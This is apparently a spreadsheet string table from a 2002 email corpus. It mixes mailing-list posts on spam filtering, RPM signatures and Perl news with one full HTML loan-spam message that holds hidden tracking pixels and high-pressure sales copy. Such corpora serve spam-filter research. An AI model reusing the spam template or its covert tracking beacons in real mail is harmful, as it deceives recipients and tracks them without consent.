             &lt;/tr&gt;
         &lt;/table&gt;
     &lt;/body&gt;
 &lt;/HTML&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] The -lm 4 blues
</t>
  </si>
  <si>
    <t xml:space="preserve">Using -lm 4 is yielding an extra 20% a day, but it gets false positives
 where it shouldn't.
 Such as an email with a Word doc and the signature below.  After looking at
 the Word doc, directions to the sender's cabin, I am convinced it marked the
 body, which contains no next except the "IncrediMail advertisment"
 signature, as spam.
 So I have to turn off -lm 4.  Razor has been getting other strange emails it
 shouldn't with -lm 4 on.
       See the incredimail ad signature I am talking about below:
       Fox
 ____________________________________________________
   IncrediMail - Email has finally evolved - Click Here
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Brendan Kehoe wrote:
 &gt; As a workaround, the various distributions could use a GPG singature to verify 
 &gt; correctness of the file.  Since the distributor's secret key is required to 
 &gt; create that signature, it would add a pretty significant step that would have 
 &gt; to be taken to make it possible to replace both a rpm or apt file and its 
 &gt; accompanying signature.
 Check your local friendly Red Hat installation:
 [root@localhost up2date]# rpm --checksig zsh-4.0.2-2.src.rpm
 zsh-4.0.2-2.src.rpm: md5 gpg ok
 Of course, this is only as useful as, say, the gpg keys distributed with 
 the Kernel tarballs, i.e. if you don't actually bother checking the sig 
 then you are open to abuse. It's entirely possible that rpm can be 
 configured to require good signatures, but I've not read that part of 
 the fine manual just yet.
 Cheers,
 Waider.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save $100's, maybe $1,000's with No Lender's Fees. Click here!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;TABLE id=AutoNumber2 style="BORDER-COLLAPSE: collapse" 
       borderColor=#111111 cellSpacing=1 cellPadding=0 width=715 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=27&gt;&lt;a href="http://www.frugaljoe.com"&gt;&lt;IMG  
             src="http://www.frugaljoe.com/logo.jpg"  border=0&gt;&lt;/a&gt;&lt;/TD&gt;
           &lt;TD width=1 bgColor=#ffcc99&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;&lt;/TD&gt;
           &lt;TD vAlign=top&gt;&lt;I&gt;&lt;B&gt;&lt;FONT face=Verdana size=2&gt;
             &lt;CENTER&gt;Never Pay Retail!&lt;/FONT&gt;&lt;FONT face=Verdana size=0&gt;&lt;/B&gt;&lt;br&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;IMG height=20 
             src="http://www.salealerts.com/dot.gif" width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=715 bgColor=#ffcc99 colSpan=3 height=1&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 
   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/TD&gt;
 &lt;FONT face=Verdana size=1&gt;
 &lt;head&gt;
 &lt;title&gt;Direct Synergy - Household Creative Sep 02&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;!-- Fireworks 4.0  Dreamweaver 4.0 target.  Created Thu Sep 05 11:26:03 GMT-0400 2002--&gt;
 &lt;/head&gt;
 &lt;img src="http://brain.roistats.com/40535/138/marker?" width="1" height="1"&gt;
 &lt;body bgcolor="#ffffff" link="#666666"&gt;
 &lt;table border="0" cellspacing="0" cellpadding="0" align="center" width="404"&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/logo.gif" width="404" height="34" vspace="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align="center"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/headline.gif" width="296" height="56" vspace="10"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table border="0" cellspacing="0" cellpadding="0" width="401"&gt;
         &lt;tr&gt;
           &lt;td valign="top" align="center" width="163"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/ani.gif" width="131" height="176"&gt;&lt;/td&gt;
           &lt;td valign="top" align="left" width="191"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/subhead.gif" width="204" height="31"&gt;&lt;br&gt;&lt;br&gt;
             &lt;font face="Arial, Helvetica, sans-serif" size="2" color="#666666"&gt;Our 
             application process is quick and easy - And, you'll receive a response 
             back in moments. &lt;br&gt;
             &lt;br&gt;
             No lender's fees means you could save &lt;b&gt;$100's&lt;/b&gt; maybe even &lt;b&gt;$1,000's&lt;/b&gt;. 
             Compare for yourself and see the difference a Household loan can make. 
             &lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#666666"&gt; 
             &lt;/font&gt; &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align="right"&gt;&lt;a href="https://www.householdloan.com/dl/lndl_Apply.jsp"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/applynow.gif" width="133" height="47" vspace="0" hspace="50" border="0"&gt;&lt;/a&gt;&lt;br&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt;
           &lt;td width="187"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/redbar.gif" width="187" height="23" vspace="5"&gt;&lt;/td&gt;
           &lt;td width="125"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/leadingcompetitor.gif" width="128" height="23" vspace="5"&gt;&lt;/td&gt;
           &lt;td width="110"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/household.gif" width="89" height="23" vspace="5"&gt;&lt;/td&gt;
         &lt;/tr&gt;
 		&lt;tr&gt;
           &lt;td valign="top" align="center" bgcolor="#FEFFE3" width="187"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="178"&gt;
               &lt;tr&gt;
                 &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2" color="#990000"&gt;Origination 
                   Fee* &lt;br&gt;
                   Doc Prep Fee &lt;br&gt;
                   Application Fee &lt;br&gt;
                   Credit Report Charge &lt;br&gt;
                   Processing Fee&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td align="center" bgcolor="#FFFFE7" width="125"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="111"&gt;
               &lt;tr&gt;
                 &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2" color="#CC6666"&gt;$250 
                   &lt;br&gt;
                   $200 &lt;br&gt;
                   $250 &lt;br&gt;
                   $25 &lt;br&gt;
                   $300&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td align="center" bgcolor="#FFFFE7" width="110"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="59"&gt;
               &lt;tr&gt;
                 &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2" color="#CC6666"&gt;$0* 
                   &lt;br&gt;
                   $0 &lt;br&gt;
                   $0 &lt;br&gt;
                   $0 &lt;br&gt;
                   $0 &lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align="center" valign="top"&gt;
       &lt;table border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt; 
           &lt;td colspan="3"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/grey_hr.gif" width="402" height="1"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top" align="center" width="187" bgcolor="#FFFFCC"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="181"&gt;
               &lt;tr&gt; 
                 &lt;td align="left" valign="top"&gt;&lt;font face="Courier New, Courier, mono" size="-1" color="#660000"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Total 
                   Lender Fees* &lt;/font&gt;&lt;br&gt;
                   &lt;/b&gt; &lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td align="center" width="128" valign="top" bgcolor="#FFFFCC"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="111"&gt;
               &lt;tr&gt; 
                 &lt;td align="left" valign="top"&gt;&lt;font face="Courier New, Courier, mono" size="-1" color="#990000"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;$1025&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Courier New, Courier, mono" size="-1" color="#CC6666"&gt;&lt;br&gt;
                   &lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td align="center" width="89" valign="top" bgcolor="#FFFFCC"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="59"&gt;
               &lt;tr&gt; 
                 &lt;td valign="top" align="left"&gt;&lt;font face="Courier New, Courier, mono" size="-1" color="#990000"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;$0*&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Courier New, Courier, mono" size="2" color="#CC6666"&gt; 
                   &lt;/font&gt;&lt;font face="Courier New, Courier, mono" size="-1" color="#CC6666"&gt;&lt;br&gt;
                   &lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;font size="2"&gt;&lt;br&gt;
       &lt;font face="Arial, Helvetica, sans-serif" color="#333333"&gt;The immediate 
       savings could mean more money for you to put toward bills, home improvements 
       or to use however you'd like.&lt;/font&gt;&lt;/font&gt;&lt;font face="Courier New, Courier, mono"&gt;&lt;br&gt;
       &lt;/font&gt;&lt;br&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#CC6600" size="-1"&gt;&lt;b&gt;&lt;font size="3" color="#FF9900"&gt;It's 
         simple to get started and there's no obligation.&lt;/font&gt;&lt;br&gt;
         &lt;i&gt;&lt;font size="3"&gt;Here's all you need to do&lt;/font&gt;&lt;/i&gt;&lt;font size="3"&gt;: 
         &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
         &lt;br&gt;
       &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align="left" valign="top"&gt; 
       &lt;table border="0" cellspacing="0" cellpadding="5"&gt;
         &lt;tr&gt; 
           &lt;td align="left" valign="top" rowspan="2"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/1.gif" width="26" height="26"&gt;&lt;/td&gt;
           &lt;td align="left" valign="top"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font color="#660000" size="-1"&gt;Find 
             the loan to fit your needs - even if you have less than perfect credit.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top" align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#CC0000"&gt;&amp;#149; 
             Mortgage Refinance Loans&lt;br&gt;
             &amp;#149; Home Equity Loans&lt;br&gt;
             &amp;#149; Personal Loans for Homeowners&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table border="0" cellspacing="0" cellpadding="5"&gt;
         &lt;tr&gt; 
           &lt;td align="left" valign="top" rowspan="2"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/2.gif" width="27" height="26"&gt;&lt;/td&gt;
           &lt;td align="left" valign="top"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font color="#660000" size="-1"&gt;&lt;a href="https://www.householdloan.com/dl/lndl_Apply.jsp"&gt;Apply 
             Online&lt;/a&gt; and you're automatically qualified for our &amp;quot;No Lender's 
             Fees&amp;quot; offer. &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top" align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#CC0000"&gt;You'll 
             save $100's right away and as a Household customer you can take advantage 
             of our Pay Right Rewards, Online Bill Pay and many other benefits 
             - which means you could save money over time as well!&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;&lt;tr&gt;
     &lt;td&gt;
       &lt;table border="0" cellspacing="0" cellpadding="5"&gt;
         &lt;tr&gt; 
           &lt;td align="left" valign="top" rowspan="2"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/3.gif" width="26" height="26"&gt;&lt;/td&gt;
           &lt;td align="left" valign="top"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font color="#660000" size="-1"&gt;With 
             an approved loan, you could lower your monthly payments by $100's.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top" align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#CC0000"&gt;Try 
             our &lt;a href="http://www.householdloan.com/dl/lndl_savingscalc.jsp"&gt;&lt;b&gt;Calculate 
             and Save tool&lt;/b&gt;&lt;/a&gt; and see for yourself!&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
  &lt;TR&gt;
     &lt;TD align="center"&gt; 
       &lt;p&gt;&lt;br&gt;
         &lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font size="3" color="#CC6600"&gt;Don't 
         delay - This is a limited time offer! &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;a href="https://www.householdloan.com/dl/lndl_Apply.jsp"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/applynow.gif" width="133" height="47" border="0"&gt;&lt;/a&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-2" color="#999999"&gt;Promotion 
         Expires 09/30/02&lt;/font&gt;&lt;/p&gt;
     &lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/grey_hr.gif" width="402" height="1" vspace="10"&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD valign="top"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#333333"&gt;&lt;b&gt;PS:&lt;/b&gt;&lt;br&gt;
       If you are a current Household customer (Household Finance Corporation, 
       Beneficial Corporation or their subsidiaries), please contact your branch 
       for more information on other great products&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#666666"&gt;. 
       &lt;br&gt;
       &lt;br&gt;
       &lt;font size="-2"&gt;* Not applicable in Illinois as origination fee may be charged. 
       You and your lender may negotiate discount points to buy down rates. Third 
       party fees such as title insurance, appraisal, closing fee, government recording 
       fee and other charges (where applicable) are the responsibility of the borrower. 
       All loans made by Household Finance Corporation (or subsidiares). &lt;/font&gt;&lt;br&gt;
       &lt;br&gt;
       As a Household company, we're part of a financial family that has been helping 
       working people since 1878. We have the experience, size and strength to 
       help you access the money you need. &lt;br&gt;&lt;br&gt;
       No time to apply right now? No problem, &lt;a href="https://www.householdloan.com/dl/lndl_Register.jsp"&gt;&lt;b&gt;click 
       here&lt;/b&gt;&lt;/a&gt; and register to receive future updates, information and special 
       offers.&lt;/font&gt;&lt;/TD&gt;
   &lt;/TR&gt;
 &lt;/table&gt;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src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;
 &lt;/TD&gt;
     &lt;TD vAlign=top&gt;&lt;I&gt;&lt;/I&gt;&lt;FONT face=Verdana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href="http://www.frugaljoe.com/unsubscribe.php?eid=399843\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here &lt;/a&gt;or
 cut and paste the following link into a web browser:&lt;br&gt;
  http://www.frugaljoe.com/unsubscribe.php?eid=399843\~moc.cnietonten^^mj\~1754388\~12a1
 &lt;br&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;IMG height=20
 src="http://www.salealerts.com/dot.gif" 
       width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;img src="http://www.330w.com/open/open.php?eid=zzzz@spamassassin.taint.org&amp;oid=John-09222002-HTML&amp;custid=frugaljoe" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.
 Brian Fahrlander &lt;kilroy@kamakiriad.com&gt; wrote:
 &gt;     What's it take to ensure we're covered against this kind of
 &gt;     childish/moronic/Microsoft-era problems?
 Well, I am checking the packet signatures while building the apt-tree.
 Not very pretty, not very fast, but it works.
 Nonetheless:
 did anyone ever play with this:
 http://distro.conectiva.com.br/pipermail/apt-rpm/2002-August/000653.html
 -- 
 R!
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-08-14
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Apress Publishes 'Writing Perl Modules for CPAN'
     * Lessig's 'Freeing Culture' Keynote Online
 +--------------------------------------------------------------------+
 | Apress Publishes 'Writing Perl Modules for CPAN'                   |
 |   posted by pudge on Tuesday August 13, @09:50 (books)             |
 |   http://use.perl.org/article.pl?sid=02/08/13/1354231              |
 +--------------------------------------------------------------------+
 [0]samtregar writes "My new book, [1]Writing Perl Modules for CPAN, is
 now available. If you ever wanted to learn to write modules and release
 them on CPAN, now is the time. For experienced module makers, the book
 offers advanced training in XS, Inline::C and CGI::Application. You can
 [2]read the first chapter online for free. The book is shipping now from
 [3]Amazon, [4]BN and others."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/13/1354231
 Links:
     0. mailto:sam@tregar.com
     1. http://apress.com/book/bookDisplay.html?bID=14
     2. http://apress.com/book/supplementDownload.html?bID=14&amp;sID=617
     3. http://www.amazon.com/exec/obidos/ASIN/159059018X
     4. http://search.barnesandnoble.com/bookSearch/isbnInquiry.asp?isbn=159059018X&amp;pdf=Y
 +--------------------------------------------------------------------+
 | Lessig's 'Freeing Culture' Keynote Online                          |
 |   posted by KM on Tuesday August 13, @11:27 (links)                |
 |   http://use.perl.org/article.pl?sid=02/08/13/1527257              |
 +--------------------------------------------------------------------+
 [0]Ask writes "Leonard Lin put up [1]Lawrence Lessig's Freeing Culture
 keynote from OSCON. It's excellent. It's great. It's the slides with
 audio in flash. So download that flash player already and click the url.
 I also [2]mirrored it at perl.org. You still here? See it already, you
 *will* be entertained. Near the end of the keynote Lessig asked how many
 had donated to the EFF. Many hands went up. We felt great. 'Yeah, we're
 helping!' Then he asked how many had donated more than they spend on
 their broadband connection... I don't think I was alone in feeling a bit
 busted. :-)"
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/13/1527257
 Links:
     0. http://www.askbjoernhansen.com/
     1. http://randomfoo.net/oscon/2002/lessig/
     2. http://www.perl.org/tpc/2002/lessig/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</si>
  <si>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Once upon a time, ""Angles" wrote :
 &gt; Matthias Saou (matthias@egwn.net) wrote*:
 &gt; &gt;You're really better off backuping all placed where you know you've hand
 &gt; &gt;edited or installed some files. For me that's only /etc/, /root/ and
 &gt; &gt;/home/. Then you reinstall cleanly, formating "/", put your /home/ files
 &gt; &gt;back into place and you're ready to go.
 &gt; 
 &gt; Matthias I gotta believe you, I've been using your RPMs for some time now
 &gt; :) That's the way I'll do it.
 I'm no "messiah", just do what you think suits you the best :-)
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.05 0.06 0.03
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Sep 09, 2002 at 11:01:22AM -0700, John Hall wrote:
 &gt; Why so fast?  Normal terminal velocity is much slower.
 Terminal velocity can be calculated by $v_{T} = \sqrt{\frac{2mg}{CpA}}$
 where C is an experimentally determined coefficient, p is the density of the
 air, and A is the area of the object. These calculations only work if the
 object is blunt and the airflow is turbulent, blah blah blah. Terminal velocity
 for a skydiver actually varies with how the diver holds themselves -- you go
 faster if you pull yourself into a cannonball. That is the "A", for the
 most part. 
 All else being equal, the terminal velocity is inversely proportional to the
 square root of air density. Air density drops off pretty quickly, and I 
 really should be doing something other than digging up the math for that. I
 think it involves calculus to integrate the amount of mass as the column of
 the atmosphere trails off. I grabbed the other stuff directly out of a book :).
 In '87 a guy named Gregory Robertson noticed a fellow parachutist Debbie 
 Williams had been knocked unconscious. He shifted so that he was head down,
 hit about 200 mi/h, and caught up with her and pulled her chute with 10 seconds
 to spare.
 -- 
 njl
</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. FoRK wrote:
 &gt; Don't know if everybody knows this trick...
 Yes. They do.
 &gt; &gt; Because we're inherently lazy, this works for windows only, 
 Huh? Oh, that's right, Unix picked up the idea of /etc/hosts
 from Windows. I keep forgetting.
  &gt; &gt; don't use it on a mac!
 Especially macs running unix (see above).
 &gt; &gt; We didn't write this file and do not provide
  &gt; &gt; support for it's use.
 We don't even know how to use the fucking English language.
 -- 
 What security level comes after "Totally Apeshit"?
      -- http://www.mnftiu.cc/mnftiu.cc/war12.html
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: S&amp;P QC
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Begeman's _Manufacturing Processes_
 talks about Quality Control Charts:
 &gt; The tolerance limits for a part are placed outside of the control
 &gt; limits and are never inside of them.  Once the control chart has
 &gt; been established, data is recorded on it and it becomes a record
 &gt; of the variation of an inspected dimension over a period of time.
 &gt; The data plotted should fall in random fashion between the control
 &gt; lines, if all assignable causes for variation are absent.  When the
 &gt; data fall in this manner, it can be assumed that the part is being
 &gt; made correctly 99.73% of the time; that is, no more than 3 out of
 &gt; 1000 will leave the process incorrectly made.
 Taking a look at the S&amp;P 500, and 
 using the Ibbotson 2000 figures of
 13% expected stock return and 20%
 standard deviation, and taking the
 the actual 2.5 year return on the
 S&amp;P since 31 Dec 1999 to be close
 to -30%, we find:
 -.30 ? 2.5*(.13) - 3*sqrt(2.5)*(.20)
 -30% &gt; -60%
 so it still plots out between the
 control lines ...
 &gt; So long as the points fall between the control lines, no adjustments
 &gt; or changes in the process are necessary.  If five to seven points fall
 &gt; on one side of the mean, the process should be checked.  When points
 &gt; fall outside of the control lines, the cause must be located and
 &gt; corrected immediately.
 ... but maybe we should've checked
 the process during the "long" bull.
 -Dave
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [SAtalk] paulgraham.com article
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, it is very impressive.  However, all of the most advanced content
 filtering known to man is easily defeated by simply presenting the content
 in the form of a graphic image (GIF, JPG, etc.).  I'm surprised that more
 spammers don't already do this.  I know we have discussed this before, and
 maybe we can detect this type of spam via the headers and with Razor/DCC (if
 you're using them).  But that sure narrows down the ruleset (maybe that's
 good).
 MTodd
 -----Original Message-----
 From: yyyy@spamassassin.taint.org [mailto:yyyy@spamassassin.taint.org]
 Sent: Friday, August 16, 2002 12:52 PM
 To: SpamAssassin-talk@example.sourceforge.net
 Subject: [SAtalk] paulgraham.com article
 Quite interesting -- it's pretty similar to the spam phrases stuff.  As
 Scott pointed out, this would work quite well as a naive Bayesian system.
 (in fact, I think it may be quite close to being one already...)
 I like the way "FL" -- ie. Florida -- is one of the top scoring terms. ;)
 Also, when I was doing the spam-phrases stuff, I discounted the ff0000
 thing, as HTML garbage! never realised it corresponded to "bright red" :(
 Have we got a test for that?
 --j.
 -- 
 'Justin Mason' =&gt; { url =&gt; http://jmason.org/ , blog =&gt; http://taint.org/ }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</si>
  <si>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Re: [ILUG] Re: Sun Solaris
</t>
  </si>
  <si>
    <t xml:space="preserve">Mark Twomey joked:
 &gt;  &gt;erm... it runs Solaris x86 as standard...
 &gt;
 &gt; It runs Solaris 8 x86 as standard.
 &gt; (I was joking Al)
 And will run Solaris 9 when Sun catch up with the x86 drivers and kernel.
 Although don't hold your breath for the free DVD. It will never come.
 (Spot the person who applied for the free Solaris 9 DVD, only to be told
 three months later it is no longer available.&lt;mutter&gt;)
 FWIW Solaris and Linux seem to be getting closer all the time. I can no
 longer see any specific reason why one is better than the other. Expect Red
 Hat Solaris 11 any time now... &lt;grin&gt;
 - Matthew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</si>
  <si>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Subject: Wannabe fathers ramp up testosterone
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8714365,1440/
 Date: Not supplied
 Men trying for a baby subconsciously influence their hormone levels - and thus 
 sperm production - to make conception more likely
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [zzzzteana] Fire fighters
</t>
  </si>
  <si>
    <t xml:space="preserve">One of the main strands of this 'modernisation' is to have all stations on a 'retained' basis at night. Basically this means that the fire station will be unmanned and in the event of a fire, the fire-fighters will be summonsed by pagers, the same way that they currently are in a lot of rural regions. The main reason for this is that fewer fires occur at night. However, the majority of fatalities in fires do occur at night and the recent deaths during the fire-fighters' strike all occurred at night. Over half of these happened in areas currently covered by retained crews who aren't on strike and would appear to give a grim foreshadowing of what may be to come. Currently one of the conditions for being in a retained crew is that you must live/work within one mile of the station. How they will apply this to whole time fire-fighters is still unclear. A good friend of mine is a station officer in Hampshire and currently lives 20 miles from his station so how he'll respond to fire calls at night is a mystery.  And I can't see many fire-fighters living within a mile of some of the inner London stations.
 Dave
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [SAtalk] How'd this one slip through?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Ouch ;-)  Although I'm not ready to give up razor just yet, I'd like to
 &gt; see a pyzor check in SA.  I don't think it even needs to be written in
 &gt; perl.  SA is actually calling razor-check and razor-report as well as
 &gt; dccproc for those checks so it should be nothing more than duplication
 &gt; of coding to add pyzor.
 I don't know from Pyzor, but I've always thought that the way services like
 Razor and DCC could be truly useful is if there were a bunch of different
 ones. We can assign them scores based on how trustworthy each one is, and
 when a message is listed in multiple services you can pretty much trust that
 it's spam.
 --
 Michael Moncur  mgm at starlingtech.com  http://www.starlingtech.com/
 "Mustard's no good without roast beef." --Chico Marx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</si>
  <si>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Scoble: "I'm just not that excited by much that Microsoft is doing."
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:11:46:59AM
 Date: Tue, 24 Sep 2002 18:46:59 GMT
 Scoble[1]: "I'm just not that excited by much that Microsoft is doing."
 [1] http://radio.weblogs.com/0001011/2002/09/24.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Comics Journal interviews Ted Rall
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516563
 Date: Not supplied
 Interview with cartoonist Ted Rall, who has traveled to South Asia recently, 
 and has tips on how to deal with bribe-hungry border guards and the like: 
     Rall: Now I realize that's just the way it is, and I know how to do it and 
     get away without paying a bribe, or paying something very modest. You have 
     to show them that you know the routine and that you know you don't have to 
     give them anything, and just have a low-key demeanor. But if you get angry, 
     that's just going to make things worse for you. You get out of your vehicle 
     and you walk up to them -- you don't try to avoid these guys; you don't try 
     to avoid their eyes -- you go up with a big smile, give them a big 
